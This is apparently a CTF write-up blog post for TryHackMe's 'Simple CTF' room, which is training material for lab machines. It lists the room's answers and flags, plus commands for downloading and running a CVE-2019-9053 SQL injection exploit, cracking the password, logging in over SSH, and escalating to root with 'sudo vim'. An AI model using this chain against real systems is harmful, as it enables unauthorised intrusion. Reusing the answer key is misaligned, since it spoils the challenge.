Skip to main content
HashnodeCyberWithSharon

Command Palette

Search for a command to run...

Challenges: Simple CTF (TryHackMe)

Updated
2 min read
Challenges: Simple CTF (TryHackMe)
J
Jebitok

Software Developer | Learning Cybersecurity | Open for roles *

If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

In this walkthrough, I’ll be going through the Simple CTF room on TryHackMe — a beginner-friendly challenge that touches on core penetration testing techniques. This room involves basic enumeration, discovering a vulnerable CMS, exploiting SQL injection (CVE-2019-9053), and using common Linux privilege escalation methods.

The goal is to gain initial access, escalate privileges, and retrieve both the user and root flags while understanding how each step reflects real-world attack scenarios.

Deploy the machine and attempt the questions!

Answer the questions below

  1. How many services are running under port 1000? 2

    nmap -p- 1-999 <target_ip>

  2. What is running on the higher port? ssh

    nmap -sV <target_ip>

  3. What's the CVE you're using against the application? CVE-2019-9053

    cpe:/o:linux:linux_kernel 5.15.0-124-generic

    The hint: An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the m1_idlist parameter.

    hostnamectl

    Searching the CMS Made Simple 2.2.8 brings up the CVE-2019-9053

  4. To what kind of vulnerability is the application vulnerable? sqli (SQL Injection)

    wget https://www.exploit-db.com/raw/46635 -O exploit.py

    pip install termcolor

    python exploit.py -u http://<target_ip>/simple --crack -w /usr/share/wordlists/rockyou.txt

  5. What's the password? secret

  6. Where can you login with the details obtained? ssh

    ssh mitch@<Target_Ip> -p 2222

  7. What's the user flag? G00d j0b, keep up!

    ls -la

    cat user.txt

  8. Is there any other user in the home directory? What's its name? sunbath

    ls /home

  9. What can you leverage to spawn a privileged shell? vim

    .viminfo - is the hint

    Use sudo vim from GTFOBins - option one

    sudo vim -c ‘:!/bin/sh’

  10. What's the root flag? W3ll d0n3. You made it!

cd ../../root

cat root.txt

The simple CTF room was a great reminder that even small misconfigurations can lead to complete system compromise. From identifying services with Nmap to exploiting a known CVE in CMS Made Simple and leveraging vim For privilege escalation, this challenge reinforces the importance of enumeration and tool familiarity.

Thanks for reading! Stay sharp, keep learning, and hack responsibly 🛡️
“Simple” challenges like these often carry big lessons.

#ctf-writeup#tryhackme#cve#sqlinjection
27 views

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

C

CyberWithSharon

432 posts